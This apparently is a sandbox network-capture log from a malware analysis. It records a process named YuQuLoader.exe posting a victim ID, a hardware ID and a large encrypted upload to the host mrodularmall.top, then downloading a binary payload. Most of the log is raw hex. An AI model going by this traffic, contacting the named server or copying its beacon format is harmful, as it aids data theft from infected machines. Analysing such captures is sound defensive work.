                                                                                    Connection: Keep-Alive
                                                                                    Content-Type: multipart/form-data; boundary=yGB1I56Y0N
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Content-Length: 587685
                                                                                    Host: mrodularmall.top
                                                                                    2025-03-11 16:23:49 UTC15331OUTData Raw: 2d 2d 79 47 42 31 49 35 36 59 30 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 37 31 64 64 34 65 64 38 37 63 64 30 31 31 64 66 30 36 34 38 38 37 32 63 30 31 36 36 30 32 33 61 35 35 34 36 37 34 32 66 65 39 34 63 66 64 39 63 61 61 66 64 37 65 61 34 0d 0a 2d 2d 79 47 42 31 49 35 36 59 30 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 79 47 42 31 49 35 36 59 30 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 32 30 46 34 41 46 36 31 43 42 30 32
                                                                                    Data Ascii: --yGB1I56Y0NContent-Disposition: form-data; name="uid"71dd4ed87cd011df0648872c0166023a5546742fe94cfd9caafd7ea4--yGB1I56Y0NContent-Disposition: form-data; name="pid"1--yGB1I56Y0NContent-Disposition: form-data; name="hwid"520F4AF61CB02
                                                                                    2025-03-11 16:23:49 UTC15331OUTData Raw: 41 c8 8a 77 41 85 cd c2 69 2e 44 9e cb 95 66 1c 78 cd c6 c7 7a 2c 5b 64 85 32 3f c3 a2 74 00 4b 4f 38 92 49 5f 01 31 52 03 5a 71 37 3c d1 3c ac 7c 4d e2 04 c1 dd 45 96 d8 18 99 26 e0 60 e8 4a 35 d3 58 88 79 37 4d e2 61 e6 e6 82 08 61 4a e6 b1 f3 0a 1d b8 8f 3d 4e 53 0c bd 96 16 59 e9 4c c6 b5 da 76 5a 55 08 04 c7 de e2 e3 36 cd 25 a1 80 c3 23 af 1f 8e 97 bb 2a 7a 5d 10 97 a7 fe dd 0f 8f ae 03 7e d6 d6 c8 3b ad 4a 96 0a 39 1d 20 af b7 a1 03 46 a7 72 68 05 d1 66 ef 3a 06 45 a5 f7 58 7c ff 25 97 9f 1f e2 c3 51 0d e2 81 e4 cf c8 ff c8 f8 cb 88 3f 76 4d c0 8e 6c 1d e9 85 82 d5 7b 9d 2c a7 13 45 a1 0e c1 81 c9 43 40 5a 05 72 83 56 e2 3d 22 40 cb 4e bd 57 c9 39 74 51 39 bb 40 0f 2e ff 16 70 68 79 f1 34 22 c5 12 1b 59 64 7a c4 67 2f d6 2b f6 2d 74 59 51 8d 01 d6
                                                                                    Data Ascii: AwAi.Dfxz,[d2?tKO8I_1RZq7<<|ME&`J5Xy7MaaJ=NSYLvZU6%#*z]~;J9 Frhf:EX|%Q?vMl{,EC@ZrV="@NW9tQ9@.phy4"Ydzg/+-tYQ
                                                                                    2025-03-11 16:23:49 UTC15331OUTData Raw: 60 2b 2c 03 96 3d 98 c2 b2 40 6f 74 4b 83 45 7d 56 d5 21 30 49 6d d7 2f b0 dd f6 b9 db fc f5 79 d5 2b b0 41 21 35 ae ef 80 49 42 b3 e6 6d 51 51 7b 01 5e 96 f2 f2 99 5a 75 07 7a d0 c0 5a 56 36 eb e0 ff ad 1b 4d 97 1b e5 bb a0 c1 3c 63 c2 48 96 f0 0e fc 28 43 a6 9b 71 21 db c4 bb 02 4d 2e b5 14 c5 25 3e 16 78 a0 1c 2c 9b 30 9f 21 dd d8 ae 6c a9 30 0d c0 98 d7 cb 5d 56 da 96 b1 0a ad 85 d7 d0 e8 5b dc 02 53 46 68 75 99 07 4f 10 e3 f2 48 9c a8 2a 4d e1 aa ee d0 f3 1e 84 30 c0 2c d8 13 db f5 52 e6 31 e1 8d 11 8b 86 c2 44 8d a3 16 93 58 a3 1b 5c df 97 2d 88 17 f3 31 dc ab 7a 34 cb bb fd 18 1f e5 82 89 4d 0d 8f 8e 4a 24 17 4f 7e 5f 7c 10 15 03 03 98 e7 c7 b4 0f 83 af 91 e2 55 fc 81 54 5d 6f 2d e5 21 07 a2 b3 dc 01 e3 e5 b0 42 27 35 11 52 7b fb 5f 13 fd 7a 22 98
                                                                                    Data Ascii: `+,=@otKE}V!0Im/y+A!5IBmQQ{^ZuzZV6M<cH(Cq!M.%>x,0!l0]V[SFhuOH*M0,R1DX\-1z4MJ$O~_|UT]o-!B'5R{_z"
                                                                                    2025-03-11 16:23:49 UTC15331OUTData Raw: fa d8 21 6c 72 36 c6 9d 9c 8b 1b 48 64 f4 e4 2d 46 bb 4f c0 db 69 b5 82 52 c0 91 91 21 24 10 dd ae 07 b5 cb 78 51 3b 2e 07 0a b6 42 29 dd 99 ab 70 51 4e 17 9d 94 51 5b 9c 27 83 c6 34 80 c6 1e 14 74 81 6f 73 5c ae 85 01 76 89 de 68 43 16 98 6e 5e c6 86 30 69 c9 4b 03 02 55 be cd 70 7b 4c 73 a4 3c 66 42 85 38 77 a8 bf 8d ec fc 3a c9 30 10 1c 25 fb 34 2e 3b 10 b5 0a 79 46 6e 00 6d ef 0c 01 32 fc 59 05 a9 5a e5 13 b5 66 c5 11 8e da 66 e5 87 b2 25 15 47 39 cc b8 e1 57 a8 4f 8d 65 d4 4b 45 70 63 e7 ff ab dc 33 3f a2 10 e5 af 7c 19 37 f9 ce 32 9d 14 25 82 d6 13 6b 14 3b b2 a2 56 34 1a 0f f5 34 f1 ff 32 65 07 e9 cf 9e 44 33 96 ab 64 1c f1 6e 6c a0 cc 08 1d 2b c3 20 a6 ab 33 78 9c a1 dd 89 2b 62 69 d6 09 b4 2a 07 d3 1b 9f e2 c5 51 88 28 7d 4f b2 4e a7 92 30 96 50
                                                                                    Data Ascii: !lr6Hd-FOiR!$xQ;.B)pQNQ['4tos\vhCn^0iKUp{Ls<fB8w:0%4.;yFnm2YZff%G9WOeKEpc3?|72%k;V442eD3dnl+ 3x+bi*Q(}ON0P
                                                                                    2025-03-11 16:23:49 UTC15331OUTData Raw: 5c 33 d4 4a 25 33 21 0f cb ad 6f 80 7a 65 12 d5 fb 3c 0f 29 40 14 00 58 5d af 8d f0 33 fd 0d 87 87 7b 75 29 cb 11 ea 79 90 f1 91 da 7c 56 e3 76 6d e1 b7 2d 26 fb 6a a0 64 2c 8f 39 3d f6 3b 18 0c 48 62 37 70 cf 69 62 92 00 9c c1 c7 17 6a 8e 7d de fc c2 2c e2 23 72 fe ce 2a c6 49 fc 44 c5 3b b0 5c ef de 8f 96 0e 19 a8 d0 cc c3 d6 30 71 92 1d 89 a1 81 9f c8 6b 3e 26 dd 6f 60 9d 32 7f 4e 78 2d 1a e1 04 ab fb 6a 29 13 a9 b4 29 a0 5e 0b 2d 54 78 40 b4 a3 7c ff a8 84 fe 9f a9 49 c1 da d2 09 2f 9f e0 4e 5b 73 c0 b8 db 4c 0f ad b5 53 1a d0 7c c0 11 99 88 00 23 48 73 cf 69 f2 de 4c 60 32 81 12 be 9d 66 9f d7 de 96 e3 a4 05 42 69 e0 7d db 5d dd 89 a5 a2 53 52 b8 b0 63 1d 24 11 b9 f7 08 b2 56 d8 72 e8 51 8c 36 fd 14 9d 06 7e d0 3f d3 cd 97 14 97 88 a1 7f 59 14 43 cb
                                                                                    Data Ascii: \3J%3!oze<)@X]3{u)y|Vvm-&jd,9=;Hb7pibj},#r*ID;\0qk>&o`2Nx-j))^-Tx@|I/N[sLS|#HsiL`2fBi}]SRc$VrQ6~?YC
                                                                                    2025-03-11 16:23:49 UTC15331OUTData Raw: c8 3d 56 14 1a 3b 2d f0 18 e3 d3 d8 8e c3 a5 2f cc bd 32 eb d9 8c f7 20 9a b5 b4 69 a3 70 f7 40 0b 86 a7 2b fa 84 9f 7c 41 8e 1d c8 33 53 51 97 45 f0 c0 45 cc 63 93 b2 2f 72 86 12 7c 71 96 52 05 4f a1 c1 e6 72 cd 9b 34 e6 37 c7 f1 9b 8e eb 0e 71 4e 01 50 73 70 4a f5 45 00 d1 db 08 40 8c 84 d4 61 79 c8 98 1a be 44 34 81 b4 18 83 a8 aa 12 e9 cc ea 4c 84 f6 01 14 e5 ec f3 f2 2b 59 c5 da 49 27 4d 09 38 5e b1 1a 68 a6 84 a1 b9 5a 40 b5 57 f0 12 fb b1 b6 13 c7 7b c9 62 fa 36 41 e2 1c 47 26 b0 d6 65 64 94 ee 46 51 b6 d0 ad 13 41 52 d1 9c 45 ee aa 1f 1d 37 e3 6e 4d ea 6b 41 6b 4f 80 ff 26 3b 12 65 49 8d 9f f2 b3 c2 40 3e e2 e9 b6 25 f5 38 ef d9 0e f2 c0 88 f9 16 94 0b fa 53 56 92 ea da e8 b7 1b 96 82 e1 d8 2b 26 72 4d 1c d8 62 51 3b de 41 9a 95 11 c3 12 58 ca 27
                                                                                    Data Ascii: =V;-/2 ip@+|A3SQEEc/r|qROr47qNPspJE@ayD4L+YI'M8^hZ@W{b6AG&edFQARE7nMkAkO&;eI@>%8SV+&rMbQ;AX'
                                                                                    2025-03-11 16:23:49 UTC15331OUTData Raw: 42 9c a5 ef e0 df 41 48 d7 8b b3 7f 7f 6d 49 30 d1 de 50 de 0a a3 27 56 d3 75 8f 5c ea 6c 7c f9 a3 25 e6 12 5f 52 f1 e6 20 b5 66 25 21 93 6a 63 b8 52 ef 1a 2c 5f 85 c5 a2 97 71 ae 85 2e d2 49 a6 62 75 1f 08 79 44 7e 53 af ea d3 f0 61 64 02 25 b8 f1 77 c2 75 0c 29 8a a1 86 a3 c0 f4 c0 4c 99 fa 7f 6f dc 8b 10 4f 0d cc 89 29 09 5f 10 3f a2 56 bc c4 f2 c3 ca a7 e1 f0 71 20 be 7c 57 53 7e 3e 76 90 aa 97 41 d3 42 04 6c 62 fc a4 2b 98 ac 9a ce 56 e9 bc c1 28 1e e2 f3 ae 37 50 35 e0 6c b6 09 7b 78 5b 85 a4 ab dc 80 fb 3e c9 6e e9 ba 8b ac 32 e1 52 b2 fe 76 e1 14 1f 91 26 06 7e 64 a9 b1 82 a9 35 50 8a 43 cc 2e 02 c4 ee 33 9b d0 9d b2 c0 42 33 2c 91 79 fa 12 f6 62 24 07 a6 50 88 57 1f fb b4 4e d8 57 2c d0 d8 9b d4 4e 9c e4 13 15 16 8e e6 ee 6c 39 b5 ef 1a ea 53 2d
                                                                                    Data Ascii: BAHmI0P'Vu\l|%_R f%!jcR,_q.IbuyD~Sad%wu)LoO)_?Vq |WS~>vABlb+V(7P5l{x[>n2Rv&~d5PC.3B3,yb$PWNW,Nl9S-
                                                                                    2025-03-11 16:23:49 UTC15331OUTData Raw: 13 e0 1f 77 0a c7 54 41 06 5f 9e 2f 05 1d e5 f9 71 ce b6 28 7c 56 e6 5b ad ac 4a e7 b6 b5 ba fb a3 fb d3 b3 56 8f 1b e3 f8 ca 24 5b c7 72 a7 30 9e 5e 59 c0 8f 80 ad 0b 48 d7 78 da af 3a d7 a3 18 95 5b d9 92 df 3c 5d ee 7b ca 5a 5b 19 99 c2 d0 38 c8 f8 a5 1f 96 07 91 73 1d a6 f0 70 87 10 c2 27 5c f0 f0 50 c9 95 86 f7 62 e2 25 87 49 e5 10 00 77 1f c7 14 90 ba fd a7 63 a8 16 85 d7 a2 36 c1 dc 33 5c d7 71 cb f4 2e bc c4 14 9d fd a5 0d f6 a2 54 b7 49 ac 99 34 74 59 8a f2 f9 b0 c8 a5 cf 33 14 4d 6f c5 d1 ca 24 5a 42 ee 4b 6a 44 34 42 b6 58 11 6b 41 7f 74 a3 b0 1d b8 5c 34 e0 02 a8 90 ea 94 62 bd 42 05 f6 b7 cd 2d ce ef ba c1 f3 16 54 ab ac 4b 62 8f 68 b6 61 63 a6 9f e5 3e 9e 2d cb 72 93 7b bf 35 6d ab 09 00 29 65 69 f3 af 32 7f 39 9c a5 1f 0d bf 83 8f 69 a8 56
                                                                                    Data Ascii: wTA_/q(|V[JV$[r0^YHx:[<]{Z[8sp'\Pb%Iwc63\q.TI4tY3Mo$ZBKjD4BXkAt\4bB-TKbhac>-r{5m)ei29iV
                                                                                    2025-03-11 16:23:49 UTC15331OUTData Raw: 14 4f 36 a9 56 03 42 eb be a1 cd a5 cc 37 a4 16 4f 06 48 48 7b 7c 25 3b 46 ee 2c a1 5f 0c 2a 58 73 a2 5d a3 de 9b 0f e2 5a f0 c7 47 3e be c4 29 2b d0 03 2c 3f bf 2f 46 58 07 d6 f6 de 30 25 b7 76 d2 f5 cb a7 fe 31 80 b7 e2 00 0a 60 3f a0 d0 7f fe 0c 2d 25 ec 69 a2 80 cd 0d 80 1d 6d 94 10 39 99 af 48 42 d8 43 31 25 05 8e aa 63 83 23 4b 2f ed 1d e1 23 f5 17 02 1f b6 df c2 7f f8 d7 61 c9 78 4a e2 fa e8 34 49 35 33 b6 ad ea 33 c7 be 01 f3 ce e9 e5 97 f0 55 1a 22 bf dd 90 51 48 9a f2 35 36 ea 1e cc aa 68 6b 47 17 0f cf 53 e6 c8 4b f9 df e9 27 7a a3 34 9a cf fb a4 86 5d 92 5c 51 3c 5a c6 3a 96 a6 0f f7 fb 93 8c 37 c6 61 7e ee 2d 04 8f f5 4b 56 08 a6 bd b4 dc 3a 28 ca e0 f5 8a 9f 79 f1 b6 df 5f fa e0 6c 84 b2 92 6b 6d a9 38 1b 6a 10 c9 9a e5 c0 ea 51 84 82 aa f0
                                                                                    Data Ascii: O6VB7OHH{|%;F,_*Xs]ZG>)+,?/FX0%v1`?-%im9HBC1%c#K/#axJ4I533U"QH56hkGSK'z4]\Q<Z:7a~-KV:(y_lkm8jQ
                                                                                    2025-03-11 16:23:49 UTC15331OUTData Raw: 96 f9 b9 bc 75 8f 41 c2 ce 0e 2d 4d ba c0 19 c3 b2 ab da ce a4 2f c7 e4 f2 06 04 f7 ca 07 7a 2d 6e 5e 93 26 3e 57 09 3c 08 c5 5f 16 3a 66 d6 90 83 7f b9 d6 93 9a 7f ce 53 20 fd 85 a4 7c 0b 8c a4 3d 3a c8 4e a9 72 2b 2a 64 9c 9b 78 87 46 c0 11 bc 4c 37 3d 6a 83 45 4a d3 7a 34 1e 52 16 37 67 c2 2a 11 11 05 a8 5c b8 25 e4 57 6d 17 4c 66 90 86 ff 73 56 1e 9a 1b 8d f6 f9 67 d9 a2 3f 25 2c b2 27 80 da 32 fe 2d 69 de 0f 27 d8 c8 be 10 a9 02 ca 06 2b 55 3d c4 00 40 ba 94 8f a1 79 bc 52 3c e9 74 94 cc ca 04 a4 dc bf d4 6f 35 0d d2 4b 4b c1 86 6a cb 20 96 05 fc 7f 2e 44 6e 01 52 0a 2d 2f b7 f7 ea 9c 9a 0d 65 6f 5a 30 95 a0 06 ee f0 44 b6 b6 61 6b 24 6e e8 4d 4f d7 ca 36 6d d8 af 19 9f d8 4c ad 28 1f eb 2e a9 e6 93 f5 87 90 64 ba 33 ab ec 19 35 33 31 4f bf bd a5 94
                                                                                    Data Ascii: uA-M/z-n^&>W<_:fS |=:Nr+*dxFL7=jEJz4R7g*\%WmLfsVg?%,'2-i'+U=@yR<to5KKj .DnR-/eoZ0Dak$nMO6mL(.d3531O
                                                                                    2025-03-11 16:23:53 UTC819INHTTP/1.1 200 OK
                                                                                    Date: Tue, 11 Mar 2025 16:23:53 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Vary: Accept-Encoding
                                                                                    cf-cache-status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ibgpD%2Ft5wd2rXFmhIM%2BzmXaDrDaYXOlzaVw%2BYq1OgF9lhzvKJXuvqFkVMTEaT%2B4WxrWAwDblb4q7isuHnWrUzyzmCKdHKQHoi8I7f0K97OlMPzCv43RTD927FFw6pQo24iJN"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 91ec660a4d4b42c8-EWR
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=45251&min_rtt=30572&rtt_var=34027&sent=231&recv=436&lost=0&retrans=1&sent_bytes=4230&recv_bytes=590269&delivery_rate=30991&cwnd=32&unsent_bytes=0&cid=ce566d772c5b5aa8&ts=3557&x=0"


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7192.168.2.549725104.21.112.14438668C:\Users\user\Desktop\YuQuLoader.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2025-03-11 16:23:55 UTC266OUTPOST /aNzS HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Content-Length: 103
                                                                                    Host: mrodularmall.top
                                                                                    2025-03-11 16:23:55 UTC103OUTData Raw: 75 69 64 3d 37 31 64 64 34 65 64 38 37 63 64 30 31 31 64 66 30 36 34 38 38 37 32 63 30 31 36 36 30 32 33 61 35 35 34 36 37 34 32 66 65 39 34 63 66 64 39 63 61 61 66 64 37 65 61 34 26 63 69 64 3d 26 68 77 69 64 3d 35 32 30 46 34 41 46 36 31 43 42 30 32 45 31 39 33 31 32 43 38 36 37 33 45 45 31 37 31 45 38 41
                                                                                    Data Ascii: uid=71dd4ed87cd011df0648872c0166023a5546742fe94cfd9caafd7ea4&cid=&hwid=520F4AF61CB02E19312C8673EE171E8A
                                                                                    2025-03-11 16:23:56 UTC786INHTTP/1.1 200 OK
                                                                                    Date: Tue, 11 Mar 2025 16:23:56 GMT
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Length: 10553
                                                                                    Connection: close
                                                                                    cf-cache-status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dTaxvz0noqHOlIaLIeKIEeijv2AGsVP%2FJaJQFb%2F9uSRjN6zQGQ62qjP5J6cgIAOHRKIIiJxVyI13T%2ByJlKh9VkhlWLM6jG8a1lacRRknWv9u9agjTcFYVGJ9Kkvz%2FMv3faDY"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 91ec662e58883b41-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=46933&min_rtt=36178&rtt_var=28812&sent=6&recv=8&lost=0&retrans=1&sent_bytes=4230&recv_bytes=1005&delivery_rate=35250&cwnd=237&unsent_bytes=0&cid=84823d9911344a24&ts=1141&x=0"
                                                                                    2025-03-11 16:23:56 UTC583INData Raw: 84 4e 22 6e 23 05 e6 66 5c 96 dc 7b 01 41 9b d7 2e 03 16 c9 a9 65 9e af 0c db dd 12 b3 f4 f2 1c 70 a0 80 1d c1 88 81 36 fe 35 cb 72 38 33 99 45 de 0b 48 ee a2 45 01 f5 a7 ec 85 9b cd b4 78 47 cd 88 0f 7e e1 c2 92 2c ae ea f6 e1 07 42 87 90 ac 10 dc 63 65 0c 18 9b 02 ac b8 ba 5b 28 46 24 93 8d af 81 20 d7 a0 a3 cd ee 77 15 b2 96 f9 29 41 28 ab a2 e1 43 c1 97 d1 1c e1 ad cb e2 58 c5 ee 1c 2e 50 c5 51 96 d2 6f 37 0f ec f1 c8 5d 71 32 06 5f c7 50 c9 db 3c a2 24 80 3c 43 17 20 b6 bb e0 52 94 59 a0 05 c4 db 12 9c 8f f0 4d b7 fd 53 52 d5 3b d6 e0 5e d6 4e 72 bb f9 d5 21 4b ff 69 29 18 55 99 cb 2e ab a9 09 4f 9b b1 ce 48 3e fe 45 f1 1a 8a 14 b6 e2 24 01 53 ed 00 ef 81 0a b7 6b 9b 4f c7 1a 48 cb 21 ae 18 e1 14 bd dd fd 35 21 0b e3 14 5d 77 e2 a7 95 f4 b4 16 41 7a
                                                                                    Data Ascii: N"n#f\{A.ep65r83EHExG~,Bce[(F$ w)A(CX.PQo7]q2_P<$<C RYMSR;^Nr!Ki)U.OH>E$SkOH!5!]wAz
                                                                                    2025-03-11 16:23:56 UTC1369INData Raw: 5e 59 fb 94 ce 0e af 54 13 71 4a 16 50 29 4f 35 b3 1c 5d 36 28 0c e1 e8 6e 78 27 97 ca 6f 5b b6 b0 9e bf 00 73 38 c5 46 c0 3e 62 17 66 4c 1f dc 5b 7f 7c f2 0d 54 40 89 24 63 61 83 27 c7 eb 64 69 03 cd 69 5e e8 85 44 e1 2f 04 df 4c 49 eb c0 e5 df 87 f6 dc 31 84 e5 53 81 88 89 cb 5e 8e a9 dc 2f 87 07 00 bf c8 17 b6 e4 08 5e 5f cd 7b d3 e8 71 32 c7 e8 db 54 29 b8 8a 54 43 60 a7 ed 28 99 ea 28 20 94 cb ec 9a 2c 3d f8 8d 0f c0 9e 62 14 e1 7a ed cb 10 fc 27 5b 9d 96 ab 25 0d 64 32 09 f1 62 d7 58 aa ae d7 e3 ad ab 54 59 c7 84 50 eb 28 12 90 c8 f4 6e 73 00 b6 ef f5 92 f3 34 fb c2 20 7b 51 ea 25 e8 b8 6f 81 a4 e8 ff 38 6d 1c 3a eb c6 f4 4d f9 36 6f 1a b9 a1 7b f5 9a f0 96 e1 46 17 25 c0 5d 9e a5 a4 e9 30 18 45 8d be 32 a2 03 12 92 96 6a 49 45 f9 94 70 d1 01 d4 ad
                                                                                    Data Ascii: ^YTqJP)O5]6(nx'o[s8F>bfL[|T@$ca'dii^D/LI1S^/^_{q2T)TC`(( ,=bz'[%d2bXTYP(ns4 {Q%o8m:M6o{F%]0E2jIEp
                                                                                    2025-03-11 16:23:56 UTC1369INData Raw: 43 0d 20 0b f8 1e 3d f4 17 64 4f 37 f5 a7 4b 7c 5b ac 41 00 4e c6 6b 62 ec 6b 9d 76 39 25 a6 39 b8 85 b9 eb 7e 7a 52 38 07 90 c3 5b bf 87 d9 f8 64 ca aa dc af 3b ba 2b 5b 27 1d 60 94 7b c0 ef 36 d3 b7 10 15 f8 f4 91 85 93 a6 17 a1 ac af c9 b1 2e 64 42 75 88 2e a0 63 c5 2f 81 a2 f9 14 03 58 dc 12 2e 8c 89 8b 9e 86 a6 72 01 06 8c db ef 81 34 46 27 48 68 fa 35 68 55 bc d5 fe 1e f4 77 41 54 f0 60 82 aa 18 ca e0 89 ed 2b 3b 23 b4 23 a1 ee 96 66 d3 85 8e 7d 5c 24 e2 13 ec 34 2b c8 36 51 36 d1 4e 02 46 66 a8 88 74 b2 ae 4c 03 29 5e d7 5c f8 d3 cf dc f0 23 43 c1 78 5e a0 46 09 69 53 cc 59 b1 fd 24 a3 c2 43 51 d9 44 19 67 23 dd 3a c6 57 73 74 55 e7 ea 57 39 30 54 eb e6 38 50 08 b2 3f c6 42 7f c5 9d 67 71 30 2b cb a8 fd a5 75 f0 6a 1b c3 f6 23 33 60 f1 9a 99 89 9d
                                                                                    Data Ascii: C =dO7K|[ANkbkv9%9~zR8[d;+['`{6.dBu.c/X.r4F'Hh5hUwAT`+;##f}\$4+6Q6NFftL)^\#Cx^FiSY$CQDg#:WstUW90T8P?Bgq0+uj#3`
                                                                                    2025-03-11 16:23:56 UTC1369INData Raw: bf fc 08 66 1d 8c 8b c9 b0 b8 cb 31 98 5a f1 7a 70 fb 5e be f9 db ce bd 50 c2 a5 ba 56 04 15 e2 9c 38 b2 e5 f3 6d 53 79 cd b5 5a f3 2f 63 e3 62 02 4d a1 71 16 c8 da 51 8d aa 91 53 87 6c 2a 3c cf a8 c5 65 ec 1c aa 0b 03 49 78 2f 14 c3 73 8c 39 88 09 fd 4d f4 f2 c8 6b 7f a7 36 17 38 36 e3 02 41 ae 7c a8 71 0b f9 e1 b3 83 0f d8 9c a4 d0 31 ab 02 1b 23 9d 0f 8f cf e9 13 28 ae 68 99 6a cb 66 d2 79 2c a4 0e df 4c dc 39 b1 8b 96 f9 ea 07 bf 78 3d b4 0d 18 a7 45 aa 3e f9 e5 35 ef f7 fb ff 99 ae 02 9d 03 24 c4 86 f1 22 64 f3 5f 11 2d fd 9b cf 55 73 d4 86 1d 19 04 94 87 f6 76 ed 94 b5 05 5a aa 5f f6 c3 43 88 17 ae 86 68 2a 60 dc 8a 64 5d e4 e9 37 e6 5f de 21 24 fe ef 74 df 80 c2 ff 15 2e 9c e2 1e a5 71 6c 02 6c 76 1e 2a 32 eb 3d a9 7c 83 5a eb 36 42 4a 6c 56 31 a5
                                                                                    Data Ascii: f1Zzp^PV8mSyZ/cbMqQSl*<eIx/s9Mk686A|q1#(hjfy,L9x=E>5$"d_-UsvZ_Ch*`d]7_!$t.qllv*2=|Z6BJlV1
                                                                                    2025-03-11 16:23:56 UTC1369INData Raw: 46 90 d3 7d a4 be 2b 18 c3 7b 94 4d 20 9a 2d 70 42 60 75 41 c9 c6 1b ec 1e 84 4a ab 3c 7b 06 67 04 5c 67 60 b5 81 6f 0e a1 4c 5d 24 41 cf 2a 17 5d b6 c5 9c 0b 86 db 08 0d 0c 02 1d c3 0c 23 10 fe 1b 75 6e 2b f8 94 f5 fb d2 03 48 34 71 54 8b 36 de c7 9e 09 a9 37 00 e3 04 2c 16 e1 a4 93 71 51 c1 57 75 14 b2 2e 4e d2 f0 2e 62 18 bc dd 90 11 67 11 15 fd 7b aa 94 5f 77 8c c8 7a c2 c0 d5 49 07 51 8f 56 f3 a0 83 46 be 42 76 86 83 7a 6d 22 7f b0 fc 00 14 c8 24 84 c9 18 fe 7d 5e 3b df 09 7d a6 16 da 45 84 f1 b8 98 c5 36 f1 de a1 9c e0 c0 64 06 61 f6 ed fe 86 98 9d f0 2d ba 7e 1d cc 08 60 43 4b 5a 1e 14 0a 18 21 74 61 fa 5d 50 78 1f 47 79 7f b2 0e a0 9b 0a 49 de 39 36 61 ca a6 59 a5 66 a2 fa 57 26 1e 9f 3a b8 cd 89 11 44 9e 93 ab 82 96 8e 1c 76 a4 c9 e0 39 b5 1b d2
                                                                                    Data Ascii: F}+{M -pB`uAJ<{g\g`oL]$A*]#un+H4qT67,qQWu.N.bg{_wzIQVFBvzm"$}^;}E6da-~`CKZ!ta]PxGyI96aYfW&:Dv9
                                                                                    2025-03-11 16:23:56 UTC1369INData Raw: 73 9c 38 9d ea 6a c9 42 b4 fc 6f e1 e5 5c ed 7a ed 80 8f f2 f7 9b 9e 15 d9 36 43 b5 7c 95 e2 ca 61 57 94 09 36 b0 d5 7f 72 50 be 53 72 6b 10 4b 57 98 a0 16 2c bb 52 d2 e6 ea 73 56 6d ad 4b 09 be 10 5b a9 e7 50 34 93 10 aa f0 d6 38 15 2e ff af a4 9c d4 2f 59 e9 67 da 9d 81 31 7f a0 55 07 77 1c cc 49 43 70 53 df fb ab 2c 08 a7 a3 ed 21 03 50 60 e2 41 fe 48 50 b5 1c 20 55 2c 17 cf 4e 89 2f 4c 32 3e 37 da 11 5c a3 ed 56 a3 1e 13 58 90 ee d8 ef e1 cd 10 68 de ed 72 77 5a e3 8f a3 b4 dc 47 f9 25 f2 53 7b 4f 0c 26 e9 42 26 a3 46 e6 54 ac 58 59 7a 9e a2 f7 cf 9e ab 1e 68 d0 5a 2e c1 c1 60 fd 35 5d e2 c1 93 0d 60 d9 d9 8a 26 1b b7 28 d7 ff bf 3f 43 7b 79 c3 d5 dd f8 e3 40 c4 1c 29 d8 ba 3c 5f c6 5d 97 ea 61 51 18 28 e8 2d 7f b2 d3 33 ee 94 26 f2 0e f0 26 13 56 03
                                                                                    Data Ascii: s8jBo\z6C|aW6rPSrkKW,RsVmK[P48./Yg1UwICpS,!P`AHP U,N/L2>7\VXhrwZG%S{O&B&FTXYzhZ.`5]`&(?C{y@)<_]aQ(-3&&V
                                                                                    2025-03-11 16:23:56 UTC1369INData Raw: 3d 24 0d 5a 9d af db a4 9c bf 80 38 ec 8c f0 2d 9c 82 f9 0b 15 ee 3b dc c9 c0 0e 71 a8 31 d8 81 b3 31 94 49 cd f2 c6 a1 82 cb a8 10 2d 90 1d 5b 50 39 45 6b 37 d9 a0 cd e1 ac 99 c0 0f 95 34 c6 f4 fa f1 53 c8 9a 52 9c 97 a9 39 75 00 da 47 75 4d 15 fc 80 cd e6 82 28 c3 a1 f9 64 83 43 8b 9a d1 d0 c6 f4 ad f1 33 9b 6d 3e f6 57 73 94 84 66 22 14 9f f4 06 5d ae 0e 51 fd 08 b3 3a 7b 2d c4 92 f6 35 a8 83 d4 d8 27 49 68 61 f7 34 94 48 85 11 e2 8a a5 39 0a c1 7a 97 fe 04 b4 18 6c 39 30 d0 1a 66 c4 63 48 34 da ea a3 62 19 6c 47 54 73 3a 90 fa e0 ae 1d cf a0 68 79 ea 49 03 48 1a 1b 15 15 c4 04 a4 70 ba 60 93 b8 c6 17 62 55 70 b7 c2 bb 5e 9d 86 6a d1 e9 05 e3 5c 39 15 d1 e3 c7 aa 81 53 33 51 53 e0 f0 6b c5 93 dd c9 ce 93 9a 07 9f c9 17 77 7a 8e 6e 9c 33 f6 e3 c6 75 f1
